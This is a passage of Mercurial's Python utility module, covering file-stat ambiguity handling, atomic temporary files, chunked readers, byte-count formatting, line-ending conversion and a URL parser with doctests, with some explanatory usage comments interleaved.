2361 2362 self.stat = stat
2362 2363
2363 2364 @classmethod
2364 2365 def frompath(cls, path):
2365 2366 try:
2366 2367 stat = os.stat(path)
2367 2368 except OSError as err:
2368 2369 if err.errno != errno.ENOENT:
2369 2370 raise
2370 2371 stat = None
2371 2372 return cls(stat)
2372 2373
2373 2374 @classmethod
2374 2375 def fromfp(cls, fp):
2375 2376 stat = os.fstat(fp.fileno())
2376 2377 return cls(stat)
2377 2378
2378 2379 __hash__ = object.__hash__
2379 2380
2380 2381 def __eq__(self, old):
2381 2382 try:
2382 2383 # if ambiguity between stat of new and old file is
2383 2384 # avoided, comparison of size, ctime and mtime is enough
2384 2385 # to exactly detect change of a file regardless of platform
2385 2386 return (
2386 2387 self.stat.st_size == old.stat.st_size
2387 2388 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2388 2389 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2389 2390 )
2390 2391 except AttributeError:
2391 2392 pass
2392 2393 try:
2393 2394 return self.stat is None and old.stat is None
2394 2395 except AttributeError:
2395 2396 return False
2396 2397
2397 2398 def isambig(self, old):
2398 2399 """Examine whether new (= self) stat is ambiguous against old one
2399 2400
2400 2401 "S[N]" below means stat of a file at N-th change:
2401 2402
2402 2403 - S[n-1].ctime < S[n].ctime: can detect change of a file
2403 2404 - S[n-1].ctime == S[n].ctime
2404 2405 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2405 2406 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2406 2407 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2407 2408 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2408 2409
2409 2410 Case (*2) above means that a file was changed twice or more within
2410 2411 the same second (= S[n-1].ctime), and comparison of timestamps
2411 2412 is ambiguous.
2412 2413
2413 2414 The basic idea to avoid such ambiguity is to "advance mtime by 1 sec
2414 2415 if the timestamp is ambiguous".
2415 2416
2416 2417 But advancing mtime only in case (*2) doesn't work as
2417 2418 expected, because naturally advanced S[n].mtime in case (*1)
2418 2419 might be equal to manually advanced S[n-1 or earlier].mtime.
2419 2420
2420 2421 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2421 2422 treated as ambiguous regardless of mtime, to avoid changes being
2422 2423 overlooked due to conflicts between such mtimes.
2423 2424
2424 2425 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2425 2426 S[n].mtime", even if size of a file isn't changed.
2426 2427 """
2427 2428 try:
2428 2429 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2429 2430 except AttributeError:
2430 2431 return False
2431 2432
2432 2433 def avoidambig(self, path, old):
2433 2434 """Change file stat of specified path to avoid ambiguity
2434 2435
2435 2436 'old' should be previous filestat of 'path'.
2436 2437
2437 2438 This skips avoiding ambiguity, if a process doesn't have
2438 2439 appropriate privileges for 'path'. This returns False in this
2439 2440 case.
2440 2441
2441 2442 Otherwise, this returns True, as "ambiguity is avoided".
2442 2443 """
2443 2444 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2444 2445 try:
2445 2446 os.utime(path, (advanced, advanced))
2446 2447 except OSError as inst:
2447 2448 if inst.errno == errno.EPERM:
2448 2449 # utime() on the file created by another user causes EPERM,
2449 2450 # if a process doesn't have appropriate privileges
2450 2451 return False
2451 2452 raise
2452 2453 return True
2453 2454
2454 2455 def __ne__(self, other):
2455 2456 return not self == other
2456 2457
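# Illustrative sketch, not part of the original source: filestat detects
# whether a file changed between two samples, including the same-second
# ambiguity handled by isambig()/avoidambig(). The path is hypothetical:
#
#     old = filestat.frompath(b'somefile')
#     # ... the file may be rewritten here ...
#     new = filestat.frompath(b'somefile')
#     if new != old:
#         pass  # content, size or timestamps changed
#     if new.isambig(old):
#         new.avoidambig(b'somefile', old)   # bump mtime by one second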
2457 2458
2458 2459 class atomictempfile(object):
2459 2460 '''writable file object that atomically updates a file
2460 2461
2461 2462 All writes will go to a temporary copy of the original file. Call
2462 2463 close() when you are done writing, and atomictempfile will rename
2463 2464 the temporary copy to the original name, making the changes
2464 2465 visible. If the object is destroyed without being closed, all your
2465 2466 writes are discarded.
2466 2467
2467 2468 checkambig argument of constructor is used with filestat, and is
2468 2469 useful only if target file is guarded by any lock (e.g. repo.lock
2469 2470 or repo.wlock).
2470 2471 '''
2471 2472
2472 2473 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2473 2474 self.__name = name # permanent name
2474 2475 self._tempname = mktempcopy(
2475 2476 name,
2476 2477 emptyok=(b'w' in mode),
2477 2478 createmode=createmode,
2478 2479 enforcewritable=(b'w' in mode),
2479 2480 )
2480 2481
2481 2482 self._fp = posixfile(self._tempname, mode)
2482 2483 self._checkambig = checkambig
2483 2484
2484 2485 # delegated methods
2485 2486 self.read = self._fp.read
2486 2487 self.write = self._fp.write
2487 2488 self.seek = self._fp.seek
2488 2489 self.tell = self._fp.tell
2489 2490 self.fileno = self._fp.fileno
2490 2491
2491 2492 def close(self):
2492 2493 if not self._fp.closed:
2493 2494 self._fp.close()
2494 2495 filename = localpath(self.__name)
2495 2496 oldstat = self._checkambig and filestat.frompath(filename)
2496 2497 if oldstat and oldstat.stat:
2497 2498 rename(self._tempname, filename)
2498 2499 newstat = filestat.frompath(filename)
2499 2500 if newstat.isambig(oldstat):
2500 2501 # stat of changed file is ambiguous to original one
2501 2502 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2502 2503 os.utime(filename, (advanced, advanced))
2503 2504 else:
2504 2505 rename(self._tempname, filename)
2505 2506
2506 2507 def discard(self):
2507 2508 if not self._fp.closed:
2508 2509 try:
2509 2510 os.unlink(self._tempname)
2510 2511 except OSError:
2511 2512 pass
2512 2513 self._fp.close()
2513 2514
2514 2515 def __del__(self):
2515 2516 if safehasattr(self, '_fp'): # constructor actually did something
2516 2517 self.discard()
2517 2518
2518 2519 def __enter__(self):
2519 2520 return self
2520 2521
2521 2522 def __exit__(self, exctype, excvalue, traceback):
2522 2523 if exctype is not None:
2523 2524 self.discard()
2524 2525 else:
2525 2526 self.close()
2526 2527
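# Illustrative sketch, not part of the original source: atomictempfile is
# typically used as a context manager, so the rename to the real name only
# happens when the block exits cleanly (the filename is hypothetical):
#
#     with atomictempfile(b'somefile', b'wb') as fp:
#         fp.write(b'new content\n')
#     # on success the temporary copy has replaced b'somefile'; on an
#     # exception it is discarded and the original file is left untouched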
2527 2528
2528 2529 def unlinkpath(f, ignoremissing=False, rmdir=True):
2529 2530 """unlink and remove the directory if it is empty"""
2530 2531 if ignoremissing:
2531 2532 tryunlink(f)
2532 2533 else:
2533 2534 unlink(f)
2534 2535 if rmdir:
2535 2536 # try removing directories that might now be empty
2536 2537 try:
2537 2538 removedirs(os.path.dirname(f))
2538 2539 except OSError:
2539 2540 pass
2540 2541
2541 2542
2542 2543 def tryunlink(f):
2543 2544 """Attempt to remove a file, ignoring ENOENT errors."""
2544 2545 try:
2545 2546 unlink(f)
2546 2547 except OSError as e:
2547 2548 if e.errno != errno.ENOENT:
2548 2549 raise
2549 2550
2550 2551
2551 2552 def makedirs(name, mode=None, notindexed=False):
2552 2553 """recursive directory creation with parent mode inheritance
2553 2554
2554 2555 Newly created directories are marked as "not to be indexed by
2555 2556 the content indexing service", if ``notindexed`` is specified
2556 2557 for "write" mode access.
2557 2558 """
2558 2559 try:
2559 2560 makedir(name, notindexed)
2560 2561 except OSError as err:
2561 2562 if err.errno == errno.EEXIST:
2562 2563 return
2563 2564 if err.errno != errno.ENOENT or not name:
2564 2565 raise
2565 2566 parent = os.path.dirname(os.path.abspath(name))
2566 2567 if parent == name:
2567 2568 raise
2568 2569 makedirs(parent, mode, notindexed)
2569 2570 try:
2570 2571 makedir(name, notindexed)
2571 2572 except OSError as err:
2572 2573 # Catch EEXIST to handle races
2573 2574 if err.errno == errno.EEXIST:
2574 2575 return
2575 2576 raise
2576 2577 if mode is not None:
2577 2578 os.chmod(name, mode)
2578 2579
2579 2580
2580 2581 def readfile(path):
2581 2582 with open(path, b'rb') as fp:
2582 2583 return fp.read()
2583 2584
2584 2585
2585 2586 def writefile(path, text):
2586 2587 with open(path, b'wb') as fp:
2587 2588 fp.write(text)
2588 2589
2589 2590
2590 2591 def appendfile(path, text):
2591 2592 with open(path, b'ab') as fp:
2592 2593 fp.write(text)
2593 2594
2594 2595
2595 2596 class chunkbuffer(object):
2596 2597 """Allow arbitrary sized chunks of data to be efficiently read from an
2597 2598 iterator over chunks of arbitrary size."""
2598 2599
2599 2600 def __init__(self, in_iter):
2600 2601 """in_iter is the iterator that's iterating over the input chunks."""
2601 2602
2602 2603 def splitbig(chunks):
2603 2604 for chunk in chunks:
2604 2605 if len(chunk) > 2 ** 20:
2605 2606 pos = 0
2606 2607 while pos < len(chunk):
2607 2608 end = pos + 2 ** 18
2608 2609 yield chunk[pos:end]
2609 2610 pos = end
2610 2611 else:
2611 2612 yield chunk
2612 2613
2613 2614 self.iter = splitbig(in_iter)
2614 2615 self._queue = collections.deque()
2615 2616 self._chunkoffset = 0
2616 2617
2617 2618 def read(self, l=None):
2618 2619 """Read L bytes of data from the iterator of chunks of data.
2619 2620 Returns less than L bytes if the iterator runs dry.
2620 2621
2621 2622 If size parameter is omitted, read everything"""
2622 2623 if l is None:
2623 2624 return b''.join(self.iter)
2624 2625
2625 2626 left = l
2626 2627 buf = []
2627 2628 queue = self._queue
2628 2629 while left > 0:
2629 2630 # refill the queue
2630 2631 if not queue:
2631 2632 target = 2 ** 18
2632 2633 for chunk in self.iter:
2633 2634 queue.append(chunk)
2634 2635 target -= len(chunk)
2635 2636 if target <= 0:
2636 2637 break
2637 2638 if not queue:
2638 2639 break
2639 2640
2640 2641 # The easy way to do this would be to queue.popleft(), modify the
2641 2642 # chunk (if necessary), then queue.appendleft(). However, for cases
2642 2643 # where we read partial chunk content, this incurs 2 dequeue
2643 2644 # mutations and creates a new str for the remaining chunk in the
2644 2645 # queue. Our code below avoids this overhead.
2645 2646
2646 2647 chunk = queue[0]
2647 2648 chunkl = len(chunk)
2648 2649 offset = self._chunkoffset
2649 2650
2650 2651 # Use full chunk.
2651 2652 if offset == 0 and left >= chunkl:
2652 2653 left -= chunkl
2653 2654 queue.popleft()
2654 2655 buf.append(chunk)
2655 2656 # self._chunkoffset remains at 0.
2656 2657 continue
2657 2658
2658 2659 chunkremaining = chunkl - offset
2659 2660
2660 2661 # Use all of unconsumed part of chunk.
2661 2662 if left >= chunkremaining:
2662 2663 left -= chunkremaining
2663 2664 queue.popleft()
2664 2665 # offset == 0 is enabled by block above, so this won't merely
2665 2666 # copy via ``chunk[0:]``.
2666 2667 buf.append(chunk[offset:])
2667 2668 self._chunkoffset = 0
2668 2669
2669 2670 # Partial chunk needed.
2670 2671 else:
2671 2672 buf.append(chunk[offset : offset + left])
2672 2673 self._chunkoffset += left
2673 2674 left -= chunkremaining
2674 2675
2675 2676 return b''.join(buf)
2676 2677
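# Illustrative sketch, not part of the original source: chunkbuffer lets a
# caller read fixed-size amounts out of an iterator of arbitrarily sized
# chunks, returning fewer bytes only when the iterator runs dry:
#
#     cb = chunkbuffer(iter([b'abc', b'defg', b'h']))
#     cb.read(4)    # -> b'abcd'
#     cb.read(3)    # -> b'efg'
#     cb.read(10)   # -> b'h' (iterator exhausted)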
2677 2678
2678 2679 def filechunkiter(f, size=131072, limit=None):
2679 2680 """Create a generator that produces the data in the file size
2680 2681 (default 131072) bytes at a time, up to optional limit (default is
2681 2682 to read all data). Chunks may be less than size bytes if the
2682 2683 chunk is the last chunk in the file, or the file is a socket or
2683 2684 some other type of file that sometimes reads less data than is
2684 2685 requested."""
2685 2686 assert size >= 0
2686 2687 assert limit is None or limit >= 0
2687 2688 while True:
2688 2689 if limit is None:
2689 2690 nbytes = size
2690 2691 else:
2691 2692 nbytes = min(limit, size)
2692 2693 s = nbytes and f.read(nbytes)
2693 2694 if not s:
2694 2695 break
2695 2696 if limit:
2696 2697 limit -= len(s)
2697 2698 yield s
2698 2699
2699 2700
2700 2701 class cappedreader(object):
2701 2702 """A file object proxy that allows reading up to N bytes.
2702 2703
2703 2704 Given a source file object, instances of this type allow reading up to
2704 2705 N bytes from that source file object. Attempts to read past the allowed
2705 2706 limit are treated as EOF.
2706 2707
2707 2708 It is assumed that I/O is not performed on the original file object
2708 2709 in addition to I/O that is performed by this instance. If there is,
2709 2710 state tracking will get out of sync and unexpected results will ensue.
2710 2711 """
2711 2712
2712 2713 def __init__(self, fh, limit):
2713 2714 """Allow reading up to <limit> bytes from <fh>."""
2714 2715 self._fh = fh
2715 2716 self._left = limit
2716 2717
2717 2718 def read(self, n=-1):
2718 2719 if not self._left:
2719 2720 return b''
2720 2721
2721 2722 if n < 0:
2722 2723 n = self._left
2723 2724
2724 2725 data = self._fh.read(min(n, self._left))
2725 2726 self._left -= len(data)
2726 2727 assert self._left >= 0
2727 2728
2728 2729 return data
2729 2730
2730 2731 def readinto(self, b):
2731 2732 res = self.read(len(b))
2732 2733 if res is None:
2733 2734 return None
2734 2735
2735 2736 b[0 : len(res)] = res
2736 2737 return len(res)
2737 2738
2738 2739
2739 2740 def unitcountfn(*unittable):
2740 2741 '''return a function that renders a readable count of some quantity'''
2741 2742
2742 2743 def go(count):
2743 2744 for multiplier, divisor, format in unittable:
2744 2745 if abs(count) >= divisor * multiplier:
2745 2746 return format % (count / float(divisor))
2746 2747 return unittable[-1][2] % count
2747 2748
2748 2749 return go
2749 2750
2750 2751
2751 2752 def processlinerange(fromline, toline):
2752 2753 """Check that linerange <fromline>:<toline> makes sense and return a
2753 2754 0-based range.
2754 2755
2755 2756 >>> processlinerange(10, 20)
2756 2757 (9, 20)
2757 2758 >>> processlinerange(2, 1)
2758 2759 Traceback (most recent call last):
2759 2760 ...
2760 2761 ParseError: line range must be positive
2761 2762 >>> processlinerange(0, 5)
2762 2763 Traceback (most recent call last):
2763 2764 ...
2764 2765 ParseError: fromline must be strictly positive
2765 2766 """
2766 2767 if toline - fromline < 0:
2767 2768 raise error.ParseError(_(b"line range must be positive"))
2768 2769 if fromline < 1:
2769 2770 raise error.ParseError(_(b"fromline must be strictly positive"))
2770 2771 return fromline - 1, toline
2771 2772
2772 2773
2773 2774 bytecount = unitcountfn(
2774 2775 (100, 1 << 30, _(b'%.0f GB')),
2775 2776 (10, 1 << 30, _(b'%.1f GB')),
2776 2777 (1, 1 << 30, _(b'%.2f GB')),
2777 2778 (100, 1 << 20, _(b'%.0f MB')),
2778 2779 (10, 1 << 20, _(b'%.1f MB')),
2779 2780 (1, 1 << 20, _(b'%.2f MB')),
2780 2781 (100, 1 << 10, _(b'%.0f KB')),
2781 2782 (10, 1 << 10, _(b'%.1f KB')),
2782 2783 (1, 1 << 10, _(b'%.2f KB')),
2783 2784 (1, 1, _(b'%.0f bytes')),
2784 2785 )
2785 2786
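# Illustrative sketch, not part of the original source: bytecount() picks the
# first row whose threshold the value reaches, so precision shrinks as values
# grow (outputs shown for the default, untranslated messages):
#
#     bytecount(500)            # -> b'500 bytes'
#     bytecount(1536)           # -> b'1.50 KB'
#     bytecount(200 * 2 ** 20)  # -> b'200 MB'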
2786 2787
2787 2788 class transformingwriter(object):
2788 2789 """Writable file wrapper to transform data by function"""
2789 2790
2790 2791 def __init__(self, fp, encode):
2791 2792 self._fp = fp
2792 2793 self._encode = encode
2793 2794
2794 2795 def close(self):
2795 2796 self._fp.close()
2796 2797
2797 2798 def flush(self):
2798 2799 self._fp.flush()
2799 2800
2800 2801 def write(self, data):
2801 2802 return self._fp.write(self._encode(data))
2802 2803
2803 2804
2804 2805 # Matches a single EOL which can either be a CRLF where repeated CR
2805 2806 # are removed or a LF. We do not care about old Macintosh files, so a
2806 2807 # stray CR is an error.
2807 2808 _eolre = remod.compile(br'\r*\n')
2808 2809
2809 2810
2810 2811 def tolf(s):
2811 2812 return _eolre.sub(b'\n', s)
2812 2813
2813 2814
2814 2815 def tocrlf(s):
2815 2816 return _eolre.sub(b'\r\n', s)
2816 2817
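# Illustrative sketch, not part of the original source: _eolre treats any run
# of CRs followed by LF as one EOL, so stray b'\r\r\n' sequences collapse too:
#
#     tolf(b'a\r\nb\r\r\nc\n')   # -> b'a\nb\nc\n'
#     tocrlf(b'a\nb\n')          # -> b'a\r\nb\r\n'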
2817 2818
2818 2819 def _crlfwriter(fp):
2819 2820 return transformingwriter(fp, tocrlf)
2820 2821
2821 2822
2822 2823 if pycompat.oslinesep == b'\r\n':
2823 2824 tonativeeol = tocrlf
2824 2825 fromnativeeol = tolf
2825 2826 nativeeolwriter = _crlfwriter
2826 2827 else:
2827 2828 tonativeeol = pycompat.identity
2828 2829 fromnativeeol = pycompat.identity
2829 2830 nativeeolwriter = pycompat.identity
2830 2831
2831 2832 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2832 2833 3,
2833 2834 0,
2834 2835 ):
2835 2836 # There is an issue in CPython that some IO methods do not handle EINTR
2836 2837 # correctly. The following table shows what CPython version (and functions)
2837 2838 # are affected (buggy: has the EINTR bug, okay: otherwise):
2838 2839 #
2839 2840 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2840 2841 # --------------------------------------------------
2841 2842 # fp.__iter__ | buggy | buggy | okay
2842 2843 # fp.read* | buggy | okay [1] | okay
2843 2844 #
2844 2845 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2845 2846 #
2846 2847 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2847 2848 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2848 2849 #
2849 2850 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2850 2851 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2851 2852 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2852 2853 # fp.__iter__ but not other fp.read* methods.
2853 2854 #
2854 2855 # On modern systems like Linux, the "read" syscall cannot be interrupted
2855 2856 # when reading "fast" files like on-disk files. So the EINTR issue only
2856 2857 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2857 2858 # files approximately as "fast" files and use the fast (unsafe) code path,
2858 2859 # to minimize the performance impact.
2859 2860 if sys.version_info >= (2, 7, 4):
2860 2861 # fp.readline deals with EINTR correctly, use it as a workaround.
2861 2862 def _safeiterfile(fp):
2862 2863 return iter(fp.readline, b'')
2863 2864
2864 2865 else:
2865 2866 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2866 2867 # note: this may block longer than necessary because of bufsize.
2867 2868 def _safeiterfile(fp, bufsize=4096):
2868 2869 fd = fp.fileno()
2869 2870 line = b''
2870 2871 while True:
2871 2872 try:
2872 2873 buf = os.read(fd, bufsize)
2873 2874 except OSError as ex:
2874 2875 # os.read only raises EINTR before any data is read
2875 2876 if ex.errno == errno.EINTR:
2876 2877 continue
2877 2878 else:
2878 2879 raise
2879 2880 line += buf
2880 2881 if b'\n' in buf:
2881 2882 splitted = line.splitlines(True)
2882 2883 line = b''
2883 2884 for l in splitted:
2884 2885 if l[-1] == b'\n':
2885 2886 yield l
2886 2887 else:
2887 2888 line = l
2888 2889 if not buf:
2889 2890 break
2890 2891 if line:
2891 2892 yield line
2892 2893
2893 2894 def iterfile(fp):
2894 2895 fastpath = True
2895 2896 if type(fp) is file:
2896 2897 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2897 2898 if fastpath:
2898 2899 return fp
2899 2900 else:
2900 2901 return _safeiterfile(fp)
2901 2902
2902 2903
2903 2904 else:
2904 2905 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2905 2906 def iterfile(fp):
2906 2907 return fp
2907 2908
2908 2909
2909 2910 def iterlines(iterator):
2910 2911 for chunk in iterator:
2911 2912 for line in chunk.splitlines():
2912 2913 yield line
2913 2914
2914 2915
2915 2916 def expandpath(path):
2916 2917 return os.path.expanduser(os.path.expandvars(path))
2917 2918
2918 2919
2919 2920 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2920 2921 """Return the result of interpolating items in the mapping into string s.
2921 2922
2922 2923 prefix is a single character string, or a two character string with
2923 2924 a backslash as the first character if the prefix needs to be escaped in
2924 2925 a regular expression.
2925 2926
2926 2927 fn is an optional function that will be applied to the replacement text
2927 2928 just before replacement.
2928 2929
2929 2930 escape_prefix is an optional flag that allows using doubled prefix for
2930 2931 its escaping.
2931 2932 """
2932 2933 fn = fn or (lambda s: s)
2933 2934 patterns = b'|'.join(mapping.keys())
2934 2935 if escape_prefix:
2935 2936 patterns += b'|' + prefix
2936 2937 if len(prefix) > 1:
2937 2938 prefix_char = prefix[1:]
2938 2939 else:
2939 2940 prefix_char = prefix
2940 2941 mapping[prefix_char] = prefix_char
2941 2942 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2942 2943 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2943 2944
2944 2945
2945 2946 def getport(port):
2946 2947 """Return the port for a given network service.
2947 2948
2948 2949 If port is an integer, it's returned as is. If it's a string, it's
2949 2950 looked up using socket.getservbyname(). If there's no matching
2950 2951 service, error.Abort is raised.
2951 2952 """
2952 2953 try:
2953 2954 return int(port)
2954 2955 except ValueError:
2955 2956 pass
2956 2957
2957 2958 try:
2958 2959 return socket.getservbyname(pycompat.sysstr(port))
2959 2960 except socket.error:
2960 2961 raise error.Abort(
2961 2962 _(b"no port number associated with service '%s'") % port
2962 2963 )
2963 2964
2964 2965
2965 2966 class url(object):
2966 2967 r"""Reliable URL parser.
2967 2968
2968 2969 This parses URLs and provides attributes for the following
2969 2970 components:
2970 2971
2971 2972 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2972 2973
2973 2974 Missing components are set to None. The only exception is
2974 2975 fragment, which is set to '' if present but empty.
2975 2976
2976 2977 If parsefragment is False, fragment is included in query. If
2977 2978 parsequery is False, query is included in path. If both are
2978 2979 False, both fragment and query are included in path.
2979 2980
2980 2981 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2981 2982
2982 2983 Note that for backward compatibility reasons, bundle URLs do not
2983 2984 take host names. That means 'bundle://../' has a path of '../'.
2984 2985
2985 2986 Examples:
2986 2987
2987 2988 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2988 2989 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2989 2990 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2990 2991 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2991 2992 >>> url(b'file:///home/joe/repo')
2992 2993 <url scheme: 'file', path: '/home/joe/repo'>
2993 2994 >>> url(b'file:///c:/temp/foo/')
2994 2995 <url scheme: 'file', path: 'c:/temp/foo/'>
2995 2996 >>> url(b'bundle:foo')
2996 2997 <url scheme: 'bundle', path: 'foo'>
2997 2998 >>> url(b'bundle://../foo')
2998 2999 <url scheme: 'bundle', path: '../foo'>
2999 3000 >>> url(br'c:\foo\bar')
3000 3001 <url path: 'c:\\foo\\bar'>
3001 3002 >>> url(br'\\blah\blah\blah')
3002 3003 <url path: '\\\\blah\\blah\\blah'>
3003 3004 >>> url(br'\\blah\blah\blah#baz')
3004 3005 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3005 3006 >>> url(br'file:///C:\users\me')
3006 3007 <url scheme: 'file', path: 'C:\\users\\me'>
3007 3008
3008 3009 Authentication credentials:
3009 3010
3010 3011 >>> url(b'ssh://joe:xyz@x/repo')
3011 3012 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3012 3013 >>> url(b'ssh://joe@x/repo')
3013 3014 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3014 3015
3015 3016 Query strings and fragments:
3016 3017
3017 3018 >>> url(b'http://host/a?b#c')
3018 3019 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3019 3020 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3020 3021 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3021 3022
3022 3023 Empty path:
3023 3024
3024 3025 >>> url(b'')
3025 3026 <url path: ''>
3026 3027 >>> url(b'#a')
3027 3028 <url path: '', fragment: 'a'>
3028 3029 >>> url(b'http://host/')
3029 3030 <url scheme: 'http', host: 'host', path: ''>
3030 3031 >>> url(b'http://host/#a')
3031 3032 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3032 3033
3033 3034 Only scheme:
3034 3035
3035 3036 >>> url(b'http:')
3036 3037 <url scheme: 'http'>
3037 3038 """
3038 3039
3039 3040 _safechars = b"!~*'()+"
3040 3041 _safepchars = b"/!~*'()+:\\"
3041 3042 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3042 3043
3043 3044 def __init__(self, path, parsequery=True, parsefragment=True):
3044 3045 # We slowly chomp away at path until we have only the path left
3045 3046 self.scheme = self.user = self.passwd = self.host = None
3046 3047 self.port = self.path = self.query = self.fragment = None
3047 3048 self._localpath = True
3048 3049 self._hostport = b''
3049 3050 self._origpath = path
3050 3051
3051 3052 if parsefragment and b'#' in path:
3052 3053 path, self.fragment = path.split(b'#', 1)
3053 3054
3054 3055 # special case for Windows drive letters and UNC paths
3055 3056 if hasdriveletter(path) or path.startswith(b'\\\\'):
3056 3057 self.path = path
3057 3058 return
3058 3059
3059 3060 # For compatibility reasons, we can't handle bundle paths as
3060 3061 # normal URLS
3061 3062 if path.startswith(b'bundle:'):
3062 3063 self.scheme = b'bundle'
3063 3064 path = path[7:]
3064 3065 if path.startswith(b'//'):
3065 3066 path = path[2:]
3066 3067 self.path = path
3067 3068 return
3068 3069
3069 3070 if self._matchscheme(path):
3070 3071 parts = path.split(b':', 1)
3071 3072 if parts[0]:
3072 3073 self.scheme, path = parts
3073 3074 self._localpath = False
3074 3075
3075 3076 if not path:
3076 3077 path = None
3077 3078 if self._localpath:
3078 3079 self.path = b''
3079 3080 return
3080 3081 else:
3081 3082 if self._localpath:
3082 3083 self.path = path
3083 3084 return
3084 3085
3085 3086 if parsequery and b'?' in path:
3086 3087 path, self.query = path.split(b'?', 1)
3087 3088 if not path:
3088 3089 path = None
3089 3090 if not self.query:
3090 3091 self.query = None
3091 3092
3092 3093 # // is required to specify a host/authority
3093 3094 if path and path.startswith(b'//'):
3094 3095 parts = path[2:].split(b'/', 1)
3095 3096 if len(parts) > 1:
3096 3097 self.host, path = parts
3097 3098 else:
3098 3099 self.host = parts[0]
3099 3100 path = None
3100 3101 if not self.host:
3101 3102 self.host = None
3102 3103 # path of file:///d is /d
3103 3104 # path of file:///d:/ is d:/, not /d:/
3104 3105 if path and not hasdriveletter(path):
3105 3106 path = b'/' + path
3106 3107
3107 3108 if self.host and b'@' in self.host:
3108 3109 self.user, self.host = self.host.rsplit(b'@', 1)
3109 3110 if b':' in self.user:
3110 3111 self.user, self.passwd = self.user.split(b':', 1)
3111 3112 if not self.host:
3112 3113 self.host = None
3113 3114
3114 3115 # Don't split on colons in IPv6 addresses without ports
3115 3116 if (
3116 3117 self.host
3117 3118 and b':' in self.host
3118 3119 and not (
3119 3120 self.host.startswith(b'[') and self.host.endswith(b']')
3120 3121 )
3121 3122 ):
3122 3123 self._hostport = self.host
3123 3124 self.host, self.port = self.host.rsplit(b':', 1)
3124 3125 if not self.host:
3125 3126 self.host = None
3126 3127
3127 3128 if (
3128 3129 self.host
3129 3130 and self.scheme == b'file'
3130 3131 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3131 3132 ):
3132 3133 raise error.Abort(
3133 3134 _(b'file:// URLs can only refer to localhost')
3134 3135 )
3135 3136
3136 3137 self.path = path
3137 3138
3138 3139 # leave the query string escaped
3139 3140 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3140 3141 v = getattr(self, a)
3141 3142 if v is not None:
3142 3143 setattr(self, a, urlreq.unquote(v))
3143 3144
3144 3145 @encoding.strmethod
3145 3146 def __repr__(self):
3146 3147 attrs = []
3147 3148 for a in (
3148 3149 b'scheme',
3149 3150 b'user',
3150 3151 b'passwd',
3151 3152 b'host',
3152 3153 b'port',
3153 3154 b'path',
3154 3155 b'query',
3155 3156 b'fragment',
3156 3157 ):
3157 3158 v = getattr(self, a)
3158 3159 if v is not None:
3159 3160 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3160 3161 return b'<url %s>' % b', '.join(attrs)
3161 3162
3162 3163 def __bytes__(self):
3163 3164 r"""Join the URL's components back into a URL string.
3164 3165
3165 3166 Examples:
3166 3167
3167 3168 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3168 3169 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3169 3170 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3170 3171 'http://user:pw@host:80/?foo=bar&baz=42'
3171 3172 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3172 3173 'http://user:pw@host:80/?foo=bar%3dbaz'
3173 3174 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3174 3175 'ssh://user:pw@[::1]:2200//home/joe#'
3175 3176 >>> bytes(url(b'http://localhost:80//'))
3176 3177 'http://localhost:80//'
3177 3178 >>> bytes(url(b'http://localhost:80/'))
3178 3179 'http://localhost:80/'
3179 3180 >>> bytes(url(b'http://localhost:80'))
3180 3181 'http://localhost:80/'
3181 3182 >>> bytes(url(b'bundle:foo'))
3182 3183 'bundle:foo'
3183 3184 >>> bytes(url(b'bundle://../foo'))
3184 3185 'bundle:../foo'
3185 3186 >>> bytes(url(b'path'))
3186 3187 'path'
3187 3188 >>> bytes(url(b'file:///tmp/foo/bar'))
3188 3189 'file:///tmp/foo/bar'
